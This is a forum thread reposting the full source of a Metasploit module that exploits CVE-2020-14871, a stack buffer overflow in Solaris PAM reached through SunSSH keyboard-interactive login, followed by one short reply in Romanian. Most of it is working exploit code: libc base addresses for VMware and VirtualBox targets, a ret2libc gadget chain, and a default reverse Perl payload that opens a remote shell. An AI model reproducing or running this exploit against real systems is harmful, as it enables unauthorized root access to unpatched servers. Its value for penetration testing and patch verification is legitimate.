Kev Posted December 18, 2020 Report Share Posted December 18, 2020 This Metasploit module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::CheckModule include Msf::Exploit::Remote::SSH def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary. }, 'Author' => [ 'Jacob Thompson', # Analysis 'Aaron Carreras', # Analysis 'Jeffrey Martin', # Testing 'Hacker Fantastic', # PoC 'wvu' # Exploit ], 'References' => [ ['CVE', '2020-14871'], ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'], ['URL', 'https://hacker.house/lab/cve-2020-18471/'], ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841'] ], 'DisclosureDate' => '2020-10-20', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617 'BadChars' => "\x00\x09\x20", 'Encoder' => 'cmd/perl' }, 'Targets' => [ [ 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware', { 'Ident' => 'SSH-2.0-Sun_SSH_1.1.5', 'LibcBase' => 0xfeb90000 } ], [ 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox', { 'Ident' => 'SSH-2.0-Sun_SSH_1.1.5', 'LibcBase' => 0xfeb80000 } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl', 'SSH_TIMEOUT' => 2, 'CheckModule' => 'auxiliary/scanner/ssh/ssh_version' }, 'Notes' => { 'Stability' => [CRASH_SERVICE_RESTARTS], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS] } ) ) end def check # Run auxiliary/scanner/ssh/ssh_version checkcode = super return checkcode unless checkcode == CheckCode::Detected unless target['Ident'] == checkcode.details[:ident] return CheckCode::Safe("#{target.name} is an incompatible target.") end CheckCode::Appears("#{target.name} is a compatible target.") end def exploit print_status("Exploiting #{target.name}") ssh_client_opts = ssh_client_defaults.merge( port: rport, auth_methods: ['keyboard-interactive'], password: ret2libc, # HACK: This is really the username prompt on Solaris timeout: datastore['SSH_TIMEOUT'] ) ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}") # Empty initial username Net::SSH.start(rhost, '', ssh_client_opts) rescue Net::SSH::AuthenticationFailed print_error(CheckCode::Safe.message) rescue Net::SSH::Disconnect print_warning('Disconnected, target selection may be incorrect!') rescue Net::SSH::ConnectionTimeout # Do nothing on success end # XXX: No ASLR, but libc base changes... def ret2libc buf = rand_text(516) buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret buf << rand_text(4) buf << p32(0x08040101) # ecx buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret buf << p32(target['LibcBase'] + 0x256d0) # exit(3) buf << p32(target['LibcBase'] + 0x91edf) # system(3) buf << rand_text(4) buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret buf << payload.encoded end def p32(addr) [addr].pack('V') end end Source 1 1 Quote Link to comment Share on other sites More sharing options...
Nytro Posted December 18, 2020 Report Share Posted December 18, 2020 Interesantul bug de anii 2000. Sunt curios cate oare astfel de bug-uri mai sunt "in the wild". Quote Link to comment Share on other sites More sharing options...